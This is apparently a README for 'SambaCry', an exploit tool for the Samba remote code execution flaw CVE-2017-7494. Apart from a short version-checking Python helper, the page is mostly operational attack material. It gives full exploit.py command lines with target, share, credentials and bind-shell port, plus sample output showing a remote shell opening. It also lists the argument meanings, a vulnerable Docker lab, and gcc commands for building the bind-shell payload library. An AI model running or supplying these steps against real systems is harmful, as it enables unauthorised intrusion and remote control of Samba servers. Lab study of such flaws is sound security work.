SambaCry RCE Exploit 2017
SambaCry - RCE exploit tool for Samba cve-2017-7494
Samba is a free software re-implementation of the SMB/CIFS networking protocol. Samba provides file and print services for various Microsoft Windows clients and can integrate with a Microsoft Windows Server domain, either as a Domain Controller (DC) or as a domain member. As of version 4, it supports Active Directory and Microsoft Windows NT domains.
Samba version 4.5.9 and earlier is vulnerable to a remote code execution vulnerability (CVE-2017-7494), nicknamed SambaCry.
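As an added check that is not part of the exploit tool: a small Python helper that parses an `smbd --version` banner and reports whether the version falls in the affected range stated above (4.5.9 and earlier). The sample banners are constructed, and since distributions often backport the fix without changing the version number, a match means the package changelog still needs checking.

```python
import re

# Upper bound of the affected range as stated on this page: 4.5.9 and earlier.
LAST_VULNERABLE = (4, 5, 9)


def parse_samba_version(banner: str):
    """Extract the numeric x.y.z from an `smbd --version` banner such as
    'Version 4.5.9-Debian'. Returns None when no version is present."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def is_in_sambacry_range(banner: str) -> bool:
    """True when the banner's version is <= 4.5.9 (the range given above).
    Distribution packages often backport the fix without bumping the
    version, so True means 'check the package changelog', not 'exploitable'."""
    v = parse_samba_version(banner)
    if v is None:
        raise ValueError(f"no Samba version found in {banner!r}")
    return v <= LAST_VULNERABLE


if __name__ == "__main__":
    # Constructed sample banners, not captured from a real host.
    samples = [
        "Version 4.5.9-Debian",
        "Version 4.6.4",
        "Version 3.6.25",
        "Version 4.5.10-Ubuntu",
    ]
    for b in samples:
        state = "in affected range" if is_in_sambacry_range(b) else "outside range"
        print(f"{b:24s} -> {state}")
```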
To properly run this exploit you will need a patched version of the impacket Python library and the other dependencies listed in the requirements file. To install all of them,
please run: pip install -r requirements.txt
After that you can run it as follows:
./exploit.py -t <target> -e libbindshell-samba.so \
    -s <share> -r <location>/libbindshell-samba.so \
    -u <user> -p <password> -P 6699
For example, if you want to exploit the vulnerable environment shipped within this repository, run:
./exploit.py -t localhost -e libbindshell-samba.so \
    -s data -r /data/libbindshell-samba.so \
    -u sambacry -p nosambanocry -P 6699
And you will get the following output.
./exploit.py -t localhost -e libbindshell-samba.so \
    -s data -r /data/libbindshell-samba.so \
    -u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>
Exploit's arguments explained:
usage: exploit.py [-h] -t TARGET -e EXECUTABLE -s REMOTESHARE -r REMOTEPATH [-u USER] [-p PASSWORD] [-P REMOTESHELLPORT]
* -t or --target - Set the remote host to attack.
* -e or --executable - Set the path on your local system where the lib that you want to load is located.
* -s or --remoteshare - Remote share where the file will be copied.
* -r or --remotepath - Where the file is located on the remote system.
* -u or --user - Username to log in with.
* -p or --password - Password to use to log in with.
* -P or --remoteshellport - If you are using a bind shell payload, connect to the payload on this port after the attack is executed.
Vulnerable environment
To simulate this attack you can use a vulnerable docker image.
If you have docker installed, just run:
docker run --rm -it \
    -p 137-139:137-139 \
    -p 445:445 -p 6699:6699 \
    vulnerables/cve-2017-7494
If you want to access, use the following credentials.
* User: sambacry
* Password: nosambanocry
Alternative payloads
You can find one example of a bind shell payload for this exploit in the bindshell-samba.c file.
Change it as you find necessary. After that, to generate a new binary, use:
gcc -c -fpic bindshell-samba.c
gcc -shared -o libbindshell-samba.so bindshell-samba.o
ThanX Malik Ubi